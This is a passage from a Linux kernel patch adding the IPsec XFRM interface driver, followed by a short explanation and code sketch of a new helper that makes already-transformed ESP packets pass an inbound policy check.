++	nf_reset_trace(skb);
++
++	if (!xnet)
++		return;
++
++	ipvs_reset(skb);
++	secpath_reset(skb);
++	skb_orphan(skb);
++	skb->mark = 0;
++}
++
++static int xfrmi_input(struct sk_buff *skb, int nexthdr, __be32 spi,
++		       int encap_type, unsigned short family)
++{
++	struct sec_path *sp;
++
++	sp = skb_sec_path(skb);
++	if (sp && (sp->len || sp->olen) &&
++	    !xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family))
++		goto discard;
++
++	XFRM_SPI_SKB_CB(skb)->family = family;
++	if (family == AF_INET) {
++		XFRM_SPI_SKB_CB(skb)->daddroff = offsetof(struct iphdr, daddr);
++		XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4 = NULL;
++	} else {
++		XFRM_SPI_SKB_CB(skb)->daddroff = offsetof(struct ipv6hdr, daddr);
++		XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6 = NULL;
++	}
++
++	return xfrm_input(skb, nexthdr, spi, encap_type);
++discard:
++	kfree_skb(skb);
++	return 0;
++}
++
++static int xfrmi4_rcv(struct sk_buff *skb)
++{
++	return xfrmi_input(skb, ip_hdr(skb)->protocol, 0, 0, AF_INET);
++}
++
++static int xfrmi6_rcv(struct sk_buff *skb)
++{
++	return xfrmi_input(skb, skb_network_header(skb)[IP6CB(skb)->nhoff],
++			   0, 0, AF_INET6);
++}
++
++static int xfrmi4_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
++{
++	return xfrmi_input(skb, nexthdr, spi, encap_type, AF_INET);
++}
++
++static int xfrmi6_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
++{
++	return xfrmi_input(skb, nexthdr, spi, encap_type, AF_INET6);
++}
++
++static int xfrmi_rcv_cb(struct sk_buff *skb, int err)
++{
++	const struct xfrm_mode *inner_mode;
++	struct net_device *dev;
++	struct xfrm_state *x;
++	struct xfrm_if *xi;
++	bool xnet;
++	int link;
++
++	if (err && !secpath_exists(skb))
++		return 0;
++
++	x = xfrm_input_state(skb);
++
++	xi = xfrmi_lookup(xs_net(x), x);
++	if (!xi)
++		return 1;
++
++	link = skb->dev->ifindex;
++	dev = xi->dev;
++	skb->dev = dev;
++
++	if (err) {
++		dev->stats.rx_errors++;
++		dev->stats.rx_dropped++;
++
++		return 0;
++	}
++
++	xnet = !net_eq(xi->net, dev_net(skb->dev));
++
++	if (xnet) {
++		inner_mode = &x->inner_mode;
++
++		if (x->sel.family == AF_UNSPEC) {
++			inner_mode = xfrm_ip2inner_mode(x, XFRM_MODE_SKB_CB(skb)->protocol);
++			if (inner_mode == NULL) {
++				XFRM_INC_STATS(dev_net(skb->dev),
++					       LINUX_MIB_XFRMINSTATEMODEERROR);
++				return -EINVAL;
++			}
++		}
++
++		if (!xfrm_policy_check(NULL, XFRM_POLICY_IN, skb,
++				       inner_mode->family))
++			return -EPERM;
++	}
++
++	xfrmi_scrub_packet(skb, xnet);
++	if (xi->p.collect_md) {
++		struct metadata_dst *md_dst;
++
++		md_dst = metadata_dst_alloc(0, METADATA_XFRM, GFP_ATOMIC);
++		if (!md_dst)
++			return -ENOMEM;
++
++		md_dst->u.xfrm_info.if_id = x->if_id;
++		md_dst->u.xfrm_info.link = link;
++		skb_dst_set(skb, (struct dst_entry *)md_dst);
++	}
++	dev_sw_netstats_rx_add(dev, skb->len);
++
++	return 0;
++}
++
++static int
++xfrmi_xmit2(struct sk_buff *skb, struct net_device *dev, struct flowi *fl)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct net_device_stats *stats = &xi->dev->stats;
++	struct dst_entry *dst = skb_dst(skb);
++	unsigned int length = skb->len;
++	struct net_device *tdev;
++	struct xfrm_state *x;
++	int err = -1;
++	u32 if_id;
++	int mtu;
++
++	if (xi->p.collect_md) {
++		struct xfrm_md_info *md_info = skb_xfrm_md_info(skb);
++
++		if (unlikely(!md_info))
++			return -EINVAL;
++
++		if_id = md_info->if_id;
++		fl->flowi_oif = md_info->link;
++	} else {
++		if_id = xi->p.if_id;
++	}
++
++	dst_hold(dst);
++	dst = xfrm_lookup_with_ifid(xi->net, dst, fl, NULL, 0, if_id);
++	if (IS_ERR(dst)) {
++		err = PTR_ERR(dst);
++		dst = NULL;
++		goto tx_err_link_failure;
++	}
++
++	x = dst->xfrm;
++	if (!x)
++		goto tx_err_link_failure;
++
++	if (x->if_id != if_id)
++		goto tx_err_link_failure;
++
++	tdev = dst->dev;
++
++	if (tdev == dev) {
++		stats->collisions++;
++		net_warn_ratelimited("%s: Local routing loop detected!\n",
++				     dev->name);
++		goto tx_err_dst_release;
++	}
++
++	mtu = dst_mtu(dst);
++	if ((!skb_is_gso(skb) && skb->len > mtu) ||
++	    (skb_is_gso(skb) && !skb_gso_validate_network_len(skb, mtu))) {
++		skb_dst_update_pmtu_no_confirm(skb, mtu);
++
++		if (skb->protocol == htons(ETH_P_IPV6)) {
++			if (mtu < IPV6_MIN_MTU)
++				mtu = IPV6_MIN_MTU;
++
++			if (skb->len > 1280)
++				icmpv6_ndo_send(skb, ICMPV6_PKT_TOOBIG, 0, mtu);
++			else
++				goto xmit;
++		} else {
++			if (!(ip_hdr(skb)->frag_off & htons(IP_DF)))
++				goto xmit;
++			icmp_ndo_send(skb, ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED,
++				      htonl(mtu));
++		}
++
++		dst_release(dst);
++		return -EMSGSIZE;
++	}
++
++xmit:
++	xfrmi_scrub_packet(skb, !net_eq(xi->net, dev_net(dev)));
++	skb_dst_set(skb, dst);
++	skb->dev = tdev;
++
++	err = dst_output(xi->net, skb->sk, skb);
++	if (net_xmit_eval(err) == 0) {
++		dev_sw_netstats_tx_add(dev, 1, length);
++	} else {
++		stats->tx_errors++;
++		stats->tx_aborted_errors++;
++	}
++
++	return 0;
++tx_err_link_failure:
++	stats->tx_carrier_errors++;
++	dst_link_failure(skb);
++tx_err_dst_release:
++	dst_release(dst);
++	return err;
++}
++
++static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct net_device_stats *stats = &xi->dev->stats;
++	struct dst_entry *dst = skb_dst(skb);
++	struct flowi fl;
++	int ret;
++
++	memset(&fl, 0, sizeof(fl));
++
++	switch (skb->protocol) {
++	case htons(ETH_P_IPV6):
++		xfrm_decode_session(skb, &fl, AF_INET6);
++		memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
++		if (!dst) {
++			fl.u.ip6.flowi6_oif = dev->ifindex;
++			fl.u.ip6.flowi6_flags |= FLOWI_FLAG_ANYSRC;
++			dst = ip6_route_output(dev_net(dev), NULL, &fl.u.ip6);
++			if (dst->error) {
++				dst_release(dst);
++				stats->tx_carrier_errors++;
++				goto tx_err;
++			}
++			skb_dst_set(skb, dst);
++		}
++		break;
++	case htons(ETH_P_IP):
++		xfrm_decode_session(skb, &fl, AF_INET);
++		memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
++		if (!dst) {
++			struct rtable *rt;
++
++			fl.u.ip4.flowi4_oif = dev->ifindex;
++			fl.u.ip4.flowi4_flags |= FLOWI_FLAG_ANYSRC;
++			rt = __ip_route_output_key(dev_net(dev), &fl.u.ip4);
++			if (IS_ERR(rt)) {
++				stats->tx_carrier_errors++;
++				goto tx_err;
++			}
++			skb_dst_set(skb, &rt->dst);
++		}
++		break;
++	default:
++		goto tx_err;
++	}
++
++	fl.flowi_oif = xi->p.link;
++
++	ret = xfrmi_xmit2(skb, dev, &fl);
++	if (ret < 0)
++		goto tx_err;
++
++	return NETDEV_TX_OK;
++
++tx_err:
++	stats->tx_errors++;
++	stats->tx_dropped++;
++	kfree_skb(skb);
++	return NETDEV_TX_OK;
++}
++
++static int xfrmi4_err(struct sk_buff *skb, u32 info)
++{
++	const struct iphdr *iph = (const struct iphdr *)skb->data;
++	struct net *net = dev_net(skb->dev);
++	int protocol = iph->protocol;
++	struct ip_comp_hdr *ipch;
++	struct ip_esp_hdr *esph;
++	struct ip_auth_hdr *ah;
++	struct xfrm_state *x;
++	struct xfrm_if *xi;
++	__be32 spi;
++
++	switch (protocol) {
++	case IPPROTO_ESP:
++		esph = (struct ip_esp_hdr *)(skb->data+(iph->ihl<<2));
++		spi = esph->spi;
++		break;
++	case IPPROTO_AH:
++		ah = (struct ip_auth_hdr *)(skb->data+(iph->ihl<<2));
++		spi = ah->spi;
++		break;
++	case IPPROTO_COMP:
++		ipch = (struct ip_comp_hdr *)(skb->data+(iph->ihl<<2));
++		spi = htonl(ntohs(ipch->cpi));
++		break;
++	default:
++		return 0;
++	}
++
++	switch (icmp_hdr(skb)->type) {
++	case ICMP_DEST_UNREACH:
++		if (icmp_hdr(skb)->code != ICMP_FRAG_NEEDED)
++			return 0;
++		break;
++	case ICMP_REDIRECT:
++		break;
++	default:
++		return 0;
++	}
++
++	x = xfrm_state_lookup(net, skb->mark, (const xfrm_address_t *)&iph->daddr,
++			      spi, protocol, AF_INET);
++	if (!x)
++		return 0;
++
++	xi = xfrmi_lookup(net, x);
++	if (!xi) {
++		xfrm_state_put(x);
++		return -1;
++	}
++
++	if (icmp_hdr(skb)->type == ICMP_DEST_UNREACH)
++		ipv4_update_pmtu(skb, net, info, 0, protocol);
++	else
++		ipv4_redirect(skb, net, 0, protocol);
++	xfrm_state_put(x);
++
++	return 0;
++}
++
++static int xfrmi6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
++		    u8 type, u8 code, int offset, __be32 info)
++{
++	const struct ipv6hdr *iph = (const struct ipv6hdr *)skb->data;
++	struct net *net = dev_net(skb->dev);
++	int protocol = iph->nexthdr;
++	struct ip_comp_hdr *ipch;
++	struct ip_esp_hdr *esph;
++	struct ip_auth_hdr *ah;
++	struct xfrm_state *x;
++	struct xfrm_if *xi;
++	__be32 spi;
++
++	switch (protocol) {
++	case IPPROTO_ESP:
++		esph = (struct ip_esp_hdr *)(skb->data + offset);
++		spi = esph->spi;
++		break;
++	case IPPROTO_AH:
++		ah = (struct ip_auth_hdr *)(skb->data + offset);
++		spi = ah->spi;
++		break;
++	case IPPROTO_COMP:
++		ipch = (struct ip_comp_hdr *)(skb->data + offset);
++		spi = htonl(ntohs(ipch->cpi));
++		break;
++	default:
++		return 0;
++	}
++
++	if (type != ICMPV6_PKT_TOOBIG &&
++	    type != NDISC_REDIRECT)
++		return 0;
++
++	x = xfrm_state_lookup(net, skb->mark, (const xfrm_address_t *)&iph->daddr,
++			      spi, protocol, AF_INET6);
++	if (!x)
++		return 0;
++
++	xi = xfrmi_lookup(net, x);
++	if (!xi) {
++		xfrm_state_put(x);
++		return -1;
++	}
++
++	if (type == NDISC_REDIRECT)
++		ip6_redirect(skb, net, skb->dev->ifindex, 0,
++			     sock_net_uid(net, NULL));
++	else
++		ip6_update_pmtu(skb, net, info, 0, 0, sock_net_uid(net, NULL));
++	xfrm_state_put(x);
++
++	return 0;
++}
++
++static int xfrmi_change(struct xfrm_if *xi, const struct xfrm_if_parms *p)
++{
++	if (xi->p.link != p->link)
++		return -EINVAL;
++
++	xi->p.if_id = p->if_id;
++
++	return 0;
++}
++
++static int xfrmi_update(struct xfrm_if *xi, struct xfrm_if_parms *p)
++{
++	struct net *net = xi->net;
++	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
++	int err;
++
++	xfrmi_unlink(xfrmn, xi);
++	synchronize_net();
++	err = xfrmi_change(xi, p);
++	xfrmi_link(xfrmn, xi);
++	netdev_state_change(xi->dev);
++	return err;
++}
++
++static int xfrmi_get_iflink(const struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++
++	return xi->p.link;
++}
++
++static const struct net_device_ops xfrmi_netdev_ops = {
++	.ndo_init	= xfrmi_dev_init,
++	.ndo_uninit	= xfrmi_dev_uninit,
++	.ndo_start_xmit = xfrmi_xmit,
++	.ndo_get_stats64 = dev_get_tstats64,
++	.ndo_get_iflink = xfrmi_get_iflink,
++};
++
++static void xfrmi_dev_setup(struct net_device *dev)
++{
++	dev->netdev_ops 	= &xfrmi_netdev_ops;
++	dev->header_ops		= &ip_tunnel_header_ops;
++	dev->type		= ARPHRD_NONE;
++	dev->mtu		= ETH_DATA_LEN;
++	dev->min_mtu		= ETH_MIN_MTU;
++	dev->max_mtu		= IP_MAX_MTU;
++	dev->flags 		= IFF_NOARP;
++	dev->needs_free_netdev	= true;
++	dev->priv_destructor	= xfrmi_dev_free;
++	netif_keep_dst(dev);
++
++	eth_broadcast_addr(dev->broadcast);
++}
++
++#define XFRMI_FEATURES (NETIF_F_SG |		\
++			NETIF_F_FRAGLIST |	\
++			NETIF_F_GSO_SOFTWARE |	\
++			NETIF_F_HW_CSUM)
++
++static int xfrmi_dev_init(struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct net_device *phydev = __dev_get_by_index(xi->net, xi->p.link);
++	int err;
++
++	dev->tstats = netdev_alloc_pcpu_stats(struct pcpu_sw_netstats);
++	if (!dev->tstats)
++		return -ENOMEM;
++
++	err = gro_cells_init(&xi->gro_cells, dev);
++	if (err) {
++		free_percpu(dev->tstats);
++		return err;
++	}
++
++	dev->features |= NETIF_F_LLTX;
++	dev->features |= XFRMI_FEATURES;
++	dev->hw_features |= XFRMI_FEATURES;
++
++	if (phydev) {
++		dev->needed_headroom = phydev->needed_headroom;
++		dev->needed_tailroom = phydev->needed_tailroom;
++
++		if (is_zero_ether_addr(dev->dev_addr))
++			eth_hw_addr_inherit(dev, phydev);
++		if (is_zero_ether_addr(dev->broadcast))
++			memcpy(dev->broadcast, phydev->broadcast,
++			       dev->addr_len);
++	} else {
++		eth_hw_addr_random(dev);
++		eth_broadcast_addr(dev->broadcast);
++	}
++
++	return 0;
++}
++
++static int xfrmi_validate(struct nlattr *tb[], struct nlattr *data[],
++			 struct netlink_ext_ack *extack)
++{
++	return 0;
++}
++
++static void xfrmi_netlink_parms(struct nlattr *data[],
++			       struct xfrm_if_parms *parms)
++{
++	memset(parms, 0, sizeof(*parms));
++
++	if (!data)
++		return;
++
++	if (data[IFLA_XFRM_LINK])
++		parms->link = nla_get_u32(data[IFLA_XFRM_LINK]);
++
++	if (data[IFLA_XFRM_IF_ID])
++		parms->if_id = nla_get_u32(data[IFLA_XFRM_IF_ID]);
++
++	if (data[IFLA_XFRM_COLLECT_METADATA])
++		parms->collect_md = true;
++}
++
++static int xfrmi_newlink(struct net *src_net, struct net_device *dev,
++			struct nlattr *tb[], struct nlattr *data[],
++			struct netlink_ext_ack *extack)
++{
++	struct net *net = dev_net(dev);
++	struct xfrm_if_parms p = {};
++	struct xfrm_if *xi;
++	int err;
++
++	xfrmi_netlink_parms(data, &p);
++	if (p.collect_md) {
++		struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
++
++		if (p.link || p.if_id) {
++			NL_SET_ERR_MSG(extack, "link and if_id must be zero");
++			return -EINVAL;
++		}
++
++		if (rtnl_dereference(xfrmn->collect_md_xfrmi))
++			return -EEXIST;
++
++	} else {
++		if (!p.if_id) {
++			NL_SET_ERR_MSG(extack, "if_id must be non zero");
++			return -EINVAL;
++		}
++
++		xi = xfrmi_locate(net, &p);
++		if (xi)
++			return -EEXIST;
++	}
++
++	xi = netdev_priv(dev);
++	xi->p = p;
++	xi->net = net;
++	xi->dev = dev;
++
++	err = xfrmi_create(dev);
++	return err;
++}
++
++static void xfrmi_dellink(struct net_device *dev, struct list_head *head)
++{
++	unregister_netdevice_queue(dev, head);
++}
++
++static int xfrmi_changelink(struct net_device *dev, struct nlattr *tb[],
++			   struct nlattr *data[],
++			   struct netlink_ext_ack *extack)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct net *net = xi->net;
++	struct xfrm_if_parms p = {};
++
++	xfrmi_netlink_parms(data, &p);
++	if (!p.if_id) {
++		NL_SET_ERR_MSG(extack, "if_id must be non zero");
++		return -EINVAL;
++	}
++
++	if (p.collect_md) {
++		NL_SET_ERR_MSG(extack, "collect_md can't be changed");
++		return -EINVAL;
++	}
++
++	xi = xfrmi_locate(net, &p);
++	if (!xi) {
++		xi = netdev_priv(dev);
++	} else {
++		if (xi->dev != dev)
++			return -EEXIST;
++		if (xi->p.collect_md) {
++			NL_SET_ERR_MSG(extack,
++				       "device can't be changed to collect_md");
++			return -EINVAL;
++		}
++	}
++
++	return xfrmi_update(xi, &p);
++}
++
++static size_t xfrmi_get_size(const struct net_device *dev)
++{
++	return
++		/* IFLA_XFRM_LINK */
++		nla_total_size(4) +
++		/* IFLA_XFRM_IF_ID */
++		nla_total_size(4) +
++		/* IFLA_XFRM_COLLECT_METADATA */
++		nla_total_size(0) +
++		0;
++}
++
++static int xfrmi_fill_info(struct sk_buff *skb, const struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct xfrm_if_parms *parm = &xi->p;
++
++	if (nla_put_u32(skb, IFLA_XFRM_LINK, parm->link) ||
++	    nla_put_u32(skb, IFLA_XFRM_IF_ID, parm->if_id) ||
++	    (xi->p.collect_md && nla_put_flag(skb, IFLA_XFRM_COLLECT_METADATA)))
++		goto nla_put_failure;
++	return 0;
++
++nla_put_failure:
++	return -EMSGSIZE;
++}
++
++static struct net *xfrmi_get_link_net(const struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++
++	return xi->net;
++}
++
++static const struct nla_policy xfrmi_policy[IFLA_XFRM_MAX + 1] = {
++	[IFLA_XFRM_UNSPEC]		= { .strict_start_type = IFLA_XFRM_COLLECT_METADATA },
++	[IFLA_XFRM_LINK]		= { .type = NLA_U32 },
++	[IFLA_XFRM_IF_ID]		= { .type = NLA_U32 },
++	[IFLA_XFRM_COLLECT_METADATA]	= { .type = NLA_FLAG },
++};
++
++static struct rtnl_link_ops xfrmi_link_ops __read_mostly = {
++	.kind		= "xfrm",
++	.maxtype	= IFLA_XFRM_MAX,
++	.policy		= xfrmi_policy,
++	.priv_size	= sizeof(struct xfrm_if),
++	.setup		= xfrmi_dev_setup,
++	.validate	= xfrmi_validate,
++	.newlink	= xfrmi_newlink,
++	.dellink	= xfrmi_dellink,
++	.changelink	= xfrmi_changelink,
++	.get_size	= xfrmi_get_size,
++	.fill_info	= xfrmi_fill_info,
++	.get_link_net	= xfrmi_get_link_net,
++};
++
++static void __net_exit xfrmi_exit_batch_net(struct list_head *net_exit_list)
++{
++	struct net *net;
++	LIST_HEAD(list);
++
++	rtnl_lock();
++	list_for_each_entry(net, net_exit_list, exit_list) {
++		struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
++		struct xfrm_if __rcu **xip;
++		struct xfrm_if *xi;
++		int i;
++
++		for (i = 0; i < XFRMI_HASH_SIZE; i++) {
++			for (xip = &xfrmn->xfrmi[i];
++			     (xi = rtnl_dereference(*xip)) != NULL;
++			     xip = &xi->next)
++				unregister_netdevice_queue(xi->dev, &list);
++		}
++		xi = rtnl_dereference(xfrmn->collect_md_xfrmi);
++		if (xi)
++			unregister_netdevice_queue(xi->dev, &list);
++	}
++	unregister_netdevice_many(&list);
++	rtnl_unlock();
++}
++
++static struct pernet_operations xfrmi_net_ops = {
++	.exit_batch = xfrmi_exit_batch_net,
++	.id   = &xfrmi_net_id,
++	.size = sizeof(struct xfrmi_net),
++};
++
++static struct xfrm6_protocol xfrmi_esp6_protocol __read_mostly = {
++	.handler	=	xfrmi6_rcv,
++	.input_handler	=	xfrmi6_input,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi6_err,
++	.priority	=	10,
++};
++
++static struct xfrm6_protocol xfrmi_ah6_protocol __read_mostly = {
++	.handler	=	xfrm6_rcv,
++	.input_handler	=	xfrm_input,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi6_err,
++	.priority	=	10,
++};
++
++static struct xfrm6_protocol xfrmi_ipcomp6_protocol __read_mostly = {
++	.handler	=	xfrm6_rcv,
++	.input_handler	=	xfrm_input,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi6_err,
++	.priority	=	10,
++};
++
++#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
++static int xfrmi6_rcv_tunnel(struct sk_buff *skb)
++{
++	const xfrm_address_t *saddr;
++	__be32 spi;
++
++	saddr = (const xfrm_address_t *)&ipv6_hdr(skb)->saddr;
++	spi = xfrm6_tunnel_spi_lookup(dev_net(skb->dev), saddr);
++
++	return xfrm6_rcv_spi(skb, IPPROTO_IPV6, spi, NULL);
++}
++
++static struct xfrm6_tunnel xfrmi_ipv6_handler __read_mostly = {
++	.handler	=	xfrmi6_rcv_tunnel,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi6_err,
++	.priority	=	2,
++};
++
++static struct xfrm6_tunnel xfrmi_ip6ip_handler __read_mostly = {
++	.handler	=	xfrmi6_rcv_tunnel,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi6_err,
++	.priority	=	2,
++};
++#endif
++
++static struct xfrm4_protocol xfrmi_esp4_protocol __read_mostly = {
++	.handler	=	xfrmi4_rcv,
++	.input_handler	=	xfrmi4_input,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi4_err,
++	.priority	=	10,
++};
++
++static struct xfrm4_protocol xfrmi_ah4_protocol __read_mostly = {
++	.handler	=	xfrm4_rcv,
++	.input_handler	=	xfrm_input,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi4_err,
++	.priority	=	10,
++};
++
++static struct xfrm4_protocol xfrmi_ipcomp4_protocol __read_mostly = {
++	.handler	=	xfrm4_rcv,
++	.input_handler	=	xfrm_input,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi4_err,
++	.priority	=	10,
++};
++
++#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
++static int xfrmi4_rcv_tunnel(struct sk_buff *skb)
++{
++	return xfrm4_rcv_spi(skb, IPPROTO_IPIP, ip_hdr(skb)->saddr);
++}
++
++static struct xfrm_tunnel xfrmi_ipip_handler __read_mostly = {
++	.handler	=	xfrmi4_rcv_tunnel,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi4_err,
++	.priority	=	3,
++};
++
++static struct xfrm_tunnel xfrmi_ipip6_handler __read_mostly = {
++	.handler	=	xfrmi4_rcv_tunnel,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi4_err,
++	.priority	=	2,
++};
++#endif
++
++static int __init xfrmi4_init(void)
++{
++	int err;
++
++	err = xfrm4_protocol_register(&xfrmi_esp4_protocol, IPPROTO_ESP);
++	if (err < 0)
++		goto xfrm_proto_esp_failed;
++	err = xfrm4_protocol_register(&xfrmi_ah4_protocol, IPPROTO_AH);
++	if (err < 0)
++		goto xfrm_proto_ah_failed;
++	err = xfrm4_protocol_register(&xfrmi_ipcomp4_protocol, IPPROTO_COMP);
++	if (err < 0)
++		goto xfrm_proto_comp_failed;
++#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
++	err = xfrm4_tunnel_register(&xfrmi_ipip_handler, AF_INET);
++	if (err < 0)
++		goto xfrm_tunnel_ipip_failed;
++	err = xfrm4_tunnel_register(&xfrmi_ipip6_handler, AF_INET6);
++	if (err < 0)
++		goto xfrm_tunnel_ipip6_failed;
++#endif
++
++	return 0;
++
++#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
++xfrm_tunnel_ipip6_failed:
++	xfrm4_tunnel_deregister(&xfrmi_ipip_handler, AF_INET);
++xfrm_tunnel_ipip_failed:
++	xfrm4_protocol_deregister(&xfrmi_ipcomp4_protocol, IPPROTO_COMP);
++#endif
++xfrm_proto_comp_failed:
++	xfrm4_protocol_deregister(&xfrmi_ah4_protocol, IPPROTO_AH);
++xfrm_proto_ah_failed:
++	xfrm4_protocol_deregister(&xfrmi_esp4_protocol, IPPROTO_ESP);
++xfrm_proto_esp_failed:
++	return err;
++}
++
++static void xfrmi4_fini(void)
++{
++#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
++	xfrm4_tunnel_deregister(&xfrmi_ipip6_handler, AF_INET6);
++	xfrm4_tunnel_deregister(&xfrmi_ipip_handler, AF_INET);
++#endif
++	xfrm4_protocol_deregister(&xfrmi_ipcomp4_protocol, IPPROTO_COMP);
++	xfrm4_protocol_deregister(&xfrmi_ah4_protocol, IPPROTO_AH);
++	xfrm4_protocol_deregister(&xfrmi_esp4_protocol, IPPROTO_ESP);
++}
++
++static int __init xfrmi6_init(void)
++{
++	int err;
++
++	err = xfrm6_protocol_register(&xfrmi_esp6_protocol, IPPROTO_ESP);
++	if (err < 0)
++		goto xfrm_proto_esp_failed;
++	err = xfrm6_protocol_register(&xfrmi_ah6_protocol, IPPROTO_AH);
++	if (err < 0)
++		goto xfrm_proto_ah_failed;
++	err = xfrm6_protocol_register(&xfrmi_ipcomp6_protocol, IPPROTO_COMP);
++	if (err < 0)
++		goto xfrm_proto_comp_failed;
++#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
++	err = xfrm6_tunnel_register(&xfrmi_ipv6_handler, AF_INET6);
++	if (err < 0)
++		goto xfrm_tunnel_ipv6_failed;
++	err = xfrm6_tunnel_register(&xfrmi_ip6ip_handler, AF_INET);
++	if (err < 0)
++		goto xfrm_tunnel_ip6ip_failed;
++#endif
++
++	return 0;
++
++#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
++xfrm_tunnel_ip6ip_failed:
++	xfrm6_tunnel_deregister(&xfrmi_ipv6_handler, AF_INET6);
++xfrm_tunnel_ipv6_failed:
++	xfrm6_protocol_deregister(&xfrmi_ipcomp6_protocol, IPPROTO_COMP);
++#endif
++xfrm_proto_comp_failed:
++	xfrm6_protocol_deregister(&xfrmi_ah6_protocol, IPPROTO_AH);
++xfrm_proto_ah_failed:
++	xfrm6_protocol_deregister(&xfrmi_esp6_protocol, IPPROTO_ESP);
++xfrm_proto_esp_failed:
++	return err;
++}
++
++static void xfrmi6_fini(void)
++{
++#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
++	xfrm6_tunnel_deregister(&xfrmi_ip6ip_handler, AF_INET);
++	xfrm6_tunnel_deregister(&xfrmi_ipv6_handler, AF_INET6);
++#endif
++	xfrm6_protocol_deregister(&xfrmi_ipcomp6_protocol, IPPROTO_COMP);
++	xfrm6_protocol_deregister(&xfrmi_ah6_protocol, IPPROTO_AH);
++	xfrm6_protocol_deregister(&xfrmi_esp6_protocol, IPPROTO_ESP);
++}
++
++static const struct xfrm_if_cb xfrm_if_cb = {
++	.decode_session =	xfrmi_decode_session,
++};
++
++static int __init xfrmi_init(void)
++{
++	const char *msg;
++	int err;
++
++	pr_info("IPsec XFRM device driver\n");
++
++	msg = "tunnel device";
++	err = register_pernet_device(&xfrmi_net_ops);
++	if (err < 0)
++		goto pernet_dev_failed;
++
++	msg = "xfrm4 protocols";
++	err = xfrmi4_init();
++	if (err < 0)
++		goto xfrmi4_failed;
++
++	msg = "xfrm6 protocols";
++	err = xfrmi6_init();
++	if (err < 0)
++		goto xfrmi6_failed;
++
++	msg = "netlink interface";
++	err = rtnl_link_register(&xfrmi_link_ops);
++	if (err < 0)
++		goto rtnl_link_failed;
++
++	lwtunnel_encap_add_ops(&xfrmi_encap_ops, LWTUNNEL_ENCAP_XFRM);
++
++	xfrm_if_register_cb(&xfrm_if_cb);
++
++	return err;
++
++rtnl_link_failed:
++	xfrmi6_fini();
++xfrmi6_failed:
++	xfrmi4_fini();
++xfrmi4_failed:
++	unregister_pernet_device(&xfrmi_net_ops);
++pernet_dev_failed:
++	pr_err("xfrmi init: failed to register %s\n", msg);
++	return err;
++}
++
++static void __exit xfrmi_fini(void)
++{
++	xfrm_if_unregister_cb();
++	lwtunnel_encap_del_ops(&xfrmi_encap_ops, LWTUNNEL_ENCAP_XFRM);
++	rtnl_link_unregister(&xfrmi_link_ops);
++	xfrmi4_fini();
++	xfrmi6_fini();
++	unregister_pernet_device(&xfrmi_net_ops);
++}
++
++module_init(xfrmi_init);
++module_exit(xfrmi_fini);
++MODULE_LICENSE("GPL");
++MODULE_ALIAS_RTNL_LINK("xfrm");
++MODULE_ALIAS_NETDEV("xfrm0");
++MODULE_AUTHOR("Steffen Klassert");
++MODULE_DESCRIPTION("XFRM virtual interface");
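
The xfrm interface driver moves into net/xfrm/xfrm_interface_core.c nearly
verbatim, but the ESP handlers are rewired: xfrmi_esp4_protocol and
xfrmi_esp6_protocol now point at xfrmi4_rcv()/xfrmi6_rcv() and
xfrmi4_input()/xfrmi6_input(), all of which funnel through the new
xfrmi_input() helper so that a packet already carrying a secpath passes an
inbound policy check before reaching xfrm_input(). A condensed sketch of that
helper, simplified from the hunk above (the per-family XFRM_SPI_SKB_CB setup
is trimmed, so this is not a drop-in replacement):

	/* Condensed from xfrmi_input() above; the AF_INET/AF_INET6
	 * daddr offset and tunnel pointer setup is omitted here.
	 */
	static int xfrmi_input_sketch(struct sk_buff *skb, int nexthdr, __be32 spi,
				      int encap_type, unsigned short family)
	{
		struct sec_path *sp = skb_sec_path(skb);

		/* A packet that already went through transforms must pass an
		 * inbound policy check before being decapsulated again.
		 */
		if (sp && (sp->len || sp->olen) &&
		    !xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family)) {
			kfree_skb(skb);
			return 0;
		}

		return xfrm_input(skb, nexthdr, spi, encap_type);
	}
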
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index e894c269affb1..7b1b93584bdbe 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
